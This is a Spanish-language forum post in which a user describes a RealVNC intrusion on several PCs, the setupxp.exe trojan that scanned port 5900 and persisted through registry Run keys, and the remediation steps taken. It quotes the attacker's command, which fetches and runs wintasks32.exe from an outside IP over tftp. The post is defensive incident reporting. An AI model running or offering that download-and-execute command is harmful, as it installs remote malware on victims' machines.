Desde hace unos dias estan ocurriendo cosas muy raras con los pc de varias personas que conozco tanto en sus trabajos como en sus casas y, me gustaria saber si alguno más le ha pasado y si a averiguado la causa inicial. Aqui va la historia:
-De repente un dia internet deja de funcionar, el router sincroniza con la adsl pero ningun equipo de la red puede navegar, ni recibir correo ni nada.
-El tecnico de la compañia telefonica certifica que el router no tiene ningun problema
-En todos los ordenadores esta instalada la aplicaion RealVNC desde hace meses (aunque solo uno de los PC tiene abierto el puerto 5900 en el router) y de vez en cuando "alguien" se conecta (saltandose las contraseñas del realvnc) y toma el control de varios ordenadores y ejecuta las siguientes acciones:
*Abre Inicio->Ejecutar->%systemroot%\system32\cmd.exe
*Desde msdos escribe esto a una velocidad imposible para la mano humana:
tftp -i 80.103.200.202 get wintasks32.exe& start wintasks32.exe& exit
*Tras descargar el archivo wintasks32.exe lo ejecuta
*Se desconecta del RealVNC
*Pasados unos minutos se vuelve a conectar y repite el
proceso.
-Instalo el DoMeter en el PC para ver el trafico de red y sin ninguna actividad por parte del usuario hay un envio y rececion de bytes considerables.
-En dicho PC, desde MS-DOS, ejecuto el "netstat -a -o" y veo que se esta produciendo un escaneo de puertos a todas las ip locales en el puerto 5900 (puerto de escucha por defecto del RealVNC).
El responsable del esacneo de puertos es un archivo llamado "setupxp.exe" que se guarda en "C:\Documents & Setings\[USUARIO]" y queda cargado en el registro de windows con el nombre de "Microsoft Windows Setup" tanto en HKLM_Software_Microsoft_Windows_Current Version_Run como en HKLM_Software_Microsoft_Windows_Current Version_Run Services. Se que ese archivo es el responsable ya que si termino ese proceso con el Administrador de Tareas el escaneo de ips cesa. Y en el momento en que lo vuelvo a ejecutar comienza el escaneo de nuevo.
Tras el susto inicial, las acciones que tome fueron:
-Buscar y eliminar el archivo setupxp.exe y wintasks32.exe en todas los ordenadores de la red (tambien eliminar las claves de registro)
-Cambiar el puerto de escucha por defecto del RealVNC
-Cerrar el puerto 5900 en el router
-Actualizar la version del RealVNC de la 4.1.1 a la 4.1.2 debido a
Ni el Nod32, ni norton2006, ni panda internet security, ni kaspersy internet security 6, ni avg antivirus (amen de todos los antipyware habido y por haber) fueron capaces de detectar nada maligno en el proceso SETUPXP.EXE. ¿alguien tiene alguna informacion de este troyano o lo que sea?¿quien lo creo?¿si es algo que ya llevaba tiempo pasando?
Desde que corté los accesos no ha vuelto a producirse ninguna conexion no autorizada, pero lo que mas me preocupa es que no se como entro el setupxp.exe en alguna de las maquinas y sobre todo como es posible que ningun antivirus o antispyware detectase nada.
Tan solo decir a todos aquellos que useis el RealVNC que verifiqueis vuestros PC y sobre todo actualizar la version del programa o cambiar de aplicacion a WinVNC, FireVNC,...
Saludos Cordiales!!